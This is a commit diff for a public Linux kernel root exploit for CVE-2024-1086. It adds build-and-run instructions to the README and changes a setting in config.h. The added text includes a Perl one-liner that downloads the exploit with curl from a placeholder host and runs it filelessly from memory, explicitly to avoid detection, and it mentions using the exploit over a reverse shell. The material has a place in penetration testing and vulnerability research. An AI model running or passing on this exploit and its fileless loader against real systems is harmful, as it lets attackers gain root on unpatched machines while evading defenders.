fix: fixed config (disable static userhelper) and added exploit usage…

… docs

README.md

@@ -1,6 +1,6 @@
 # CVE-2024-1086
 
-Proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between (including) v5.14 and (including) v6.6, including (but not limited to) Debian, Ubuntu, and KernelCTF. The success rate is typically around 99,4% (n=1000) to 93% (n=1000). 
+Fileless proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between (including) v5.14 and (including) v6.6, including (but not limited to) Debian, Ubuntu, and KernelCTF. The success rate is typically around 99,4% (n=1000) to 93% (n=1000). 
 
 ---
 
@@ -11,6 +11,50 @@ The only requirements are that user namespaces are enabled (kconfig `CONFIG_USER
 - the exploit may be unstable on systems with a WiFi adapter, surrounded by high-usage WiFi networks. When testing, please turn off WiFi adapters through BIOS.
 - the exploit does not work v6.4> kernels with kconfig `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` (including Ubuntu v6.5)
 
+## using the exploit
+
+### configuring the exploit
+
+In [`src/config.h`](/src/config.h) are several configuration values which may need to be tweaked.
+
+The default values should work out of the box (and have been tested for stability) on tested setups (see blogpost). On non-tested setups/distros, please make sure the kconfig values match with the target kernel.
+
+Note that if you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to toggle `CONFIG_REDIRECT_LOG` to `1` to avoid unnecessary network activity.
+
+### building the exploit
+
+Building the exploit is incredibly easy (outfile: `CVE-2024-1086/exploit`):
+
+```bash
+git clone https://github.com/Notselwyn/CVE-2024-1086
+cd CVE-2024-1086
+make
+```
+
+Please note that you may need to install certain tools like musl-gcc. Because of the different distros you may want to compile this exploit on, I will not provide instructions on how to install those.
+
+### running the exploit
+
+Running the exploit is just as trivial:
+
+```bash
+./exploit
+```
+
+Note that fileless execution is also supported, in case of pentest situations where detections need to be avoided.
+
+Perl needs to be installed on the target:
+```bash
+perl -e '
+  require qw/syscall.ph/;
+
+  my $fd = syscall(SYS_memfd_create(), $fn, 0);
+  open(my $fh, ">&=".$fd);
+  print $fh `curl https://example.com/exploit -s`;
+  exec {"/proc/$$/fd/$fd"} "memfd";
+'
+```
+
 ## blogpost / write-up
 
 A full write-up of the exploit can be found in the blogpost: ["Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques"](https://pwning.tech/nftables/) @ pwning.tech

src/config.h

@@ -4,7 +4,7 @@
 
 #define KMOD_PATH_LEN 256  // default
 
-#define CONFIG_STATIC_USERMODEHELPER 1 // default
+#define CONFIG_STATIC_USERMODEHELPER 0 // default
 #define CONFIG_STATIC_USERMODEHELPER_PATH "/sbin/usermode-helper" // default. if 1: check for this instead of modprobe_path
 
 // if CONFIG_PHYSICAL_ALIGN is not defined in kconfig, use the CONFIG_PHYSICAL_START value